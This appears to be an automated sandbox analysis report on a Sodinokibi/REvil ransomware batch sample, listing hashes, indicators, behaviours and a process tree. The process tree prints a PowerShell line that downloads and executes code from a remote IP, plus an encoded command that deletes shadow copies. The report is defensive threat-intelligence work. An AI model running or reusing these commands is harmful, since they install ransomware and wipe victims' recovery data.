Analysis
-
max time kernel
36s -
max time network
55s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
01-06-2020 14:10
Static task
static1
Behavioral task
behavioral1
Sample
02025aebdb58d5c91227c70c8d753db5.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
02025aebdb58d5c91227c70c8d753db5.bat
Resource
win10v200430
General
-
Target
02025aebdb58d5c91227c70c8d753db5.bat
-
Size
217B
-
MD5
abbe954f66b1dd339f454ca325488e57
-
SHA1
ecbf3a90c0936599cb41a907bd278fb7f9c0dc23
-
SHA256
2bba8f17fc1ba279cde43a2555b981ff02d563e845d42800bb51973fe66b4a40
-
SHA512
674f4a11ca927f19e02d1940711ca082069fa226e31cad3456370e990151f681ff6a611b8b25f42fb366748f10899bf26907b35770e790c08209d2ca1b9a97f3
Malware Config
Extracted
http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5
Extracted
C:\2gqxv6-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/72B60BE891E1358C
http://decryptor.cc/72B60BE891E1358C
Signatures
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1540 powershell.exe 1540 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1100 wrote to memory of 1296 1100 cmd.exe powershell.exe PID 1296 wrote to memory of 1540 1296 powershell.exe powershell.exe PID 1296 wrote to memory of 1540 1296 powershell.exe powershell.exe PID 1296 wrote to memory of 1540 1296 powershell.exe powershell.exe PID 1296 wrote to memory of 1540 1296 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeBackupPrivilege 1816 vssvc.exe Token: SeRestorePrivilege 1816 vssvc.exe Token: SeAuditPrivilege 1816 vssvc.exe Token: SeTakeOwnershipPrivilege 1296 powershell.exe -
Drops file in Program Files directory 17 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\AssertDebug.dwg powershell.exe File opened for modification \??\c:\program files\BlockImport.xhtml powershell.exe File opened for modification \??\c:\program files\MergeSet.xlsx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\2gqxv6-readme.txt powershell.exe File opened for modification \??\c:\program files\UnprotectCompare.ppsx powershell.exe File opened for modification \??\c:\program files\UnpublishRestore.xps powershell.exe File opened for modification \??\c:\program files\WaitConnect.xps powershell.exe File created \??\c:\program files (x86)\2gqxv6-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2gqxv6-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromCheckpoint.js powershell.exe File opened for modification \??\c:\program files\OutRequest.ini powershell.exe File opened for modification \??\c:\program files\UseInvoke.xltm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\2gqxv6-readme.txt powershell.exe File created \??\c:\program files\2gqxv6-readme.txt powershell.exe File opened for modification \??\c:\program files\ResetAssert.vssx powershell.exe File opened for modification \??\c:\program files\PushSync.tmp powershell.exe File opened for modification \??\c:\program files\WatchOut.clr powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\721f3h7zn545w.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1296 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1296 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\02025aebdb58d5c91227c70c8d753db5.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5');Invoke-YKSOHGHYRH;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
PID:1296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1816